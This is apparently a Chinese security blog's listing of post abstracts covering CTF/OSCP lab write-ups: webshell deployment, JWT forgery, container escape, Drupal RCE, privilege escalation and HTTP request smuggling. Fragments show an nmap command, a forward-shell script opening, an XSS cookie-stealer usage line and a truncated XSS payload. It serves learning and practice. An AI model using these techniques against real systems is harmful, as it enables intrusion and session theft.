摘要:
git历史commit泄露密码,tomcat后台部署webshell,ansible playbook执行命令 阅读全文
摘要:
前言 记录一些打靶机过程中修改的脚本。 xss-cookie-stealer python3版本,就是一个服务端,实时输出访问日志(弹回来的cookie) python3 xss-cookie-stealer.py |tee log.txt 原仓库 使用方法 式例如下 <img src=x oner 阅读全文
摘要:
oscp考试中涉及到的缓冲区溢出一般流程,与实际练习。 阅读全文
摘要:
jwt token伪造,容器逃逸 阅读全文
摘要:
druppal geddon2 RCE,snap本地提权 阅读全文
摘要:
信息泄露,wordpress后台getshell, suid提权。PHP/8.1.0-dev后门 阅读全文
摘要:
端口扫描 nmap -sV -v -A ip nmap -sU ip #udp扫描,一般用不着,没思路了可以试试 正向shell Linux python from socket import * import subprocess import os, threading, sys, time i 阅读全文
摘要:
##前言 本来想写成获取参数,启动nmap扫描端口,对所有得到HTTP端口进行测试。后来偷懒写成pocsuite3的插件了。 项目地址 ##原理与攻击面 协议层的攻击——HTTP请求走私 一篇文章带你读懂http请求走私 seebug这篇中提到的几篇blackhat议题建议都看看 ##检测脚本-草稿 阅读全文